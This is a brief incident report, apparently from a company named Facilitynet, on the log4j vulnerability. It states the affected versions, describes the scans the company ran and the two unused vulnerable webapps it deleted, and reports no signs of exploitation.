Description of vulnerability
A critical vulnerability has been discovered in the Java logging library log4j. The vulnerability means that if an attacker can cause some chosen text to be logged by an affected application, they can complete a variety of objectives including:
- Exfiltration of sensitive data such as credentials.
- Remote code execution.
- Execution of shell commands.
Affected versions
This exploit affects Log4j versions between 2.0-beta-9 and 2.14.1. It is fully fixed from version 2.16.0.
Was Facilitynet affected?
No.
What did we do?
First we performed a quick scan to look for log4j JAR files. The scan of our servers showed that 2 webapps were affected by the vulnerability since they were using a vulnerable version of log4j. The webapps were not actively used so we promptly deleted them from the server.
Next we performed a more thorough scan using a vulnerability scanner. This did not turn out any additional affected applications.
We performed a scan of the access logs to see if the vulnerable webapps had been exploited. No attacks were found. We did see some attempts to hit various standard URL locations indicating activity by scanners to catalogue easily exploitable servers.
Conclusion
Fortunately we were not using any affected versions in our main webapps. This incident shows the need to be more proactive with respect to vulnerability scanning.
We are planning to implement automated vulnerability scanning so we can act with even greater speed in the future.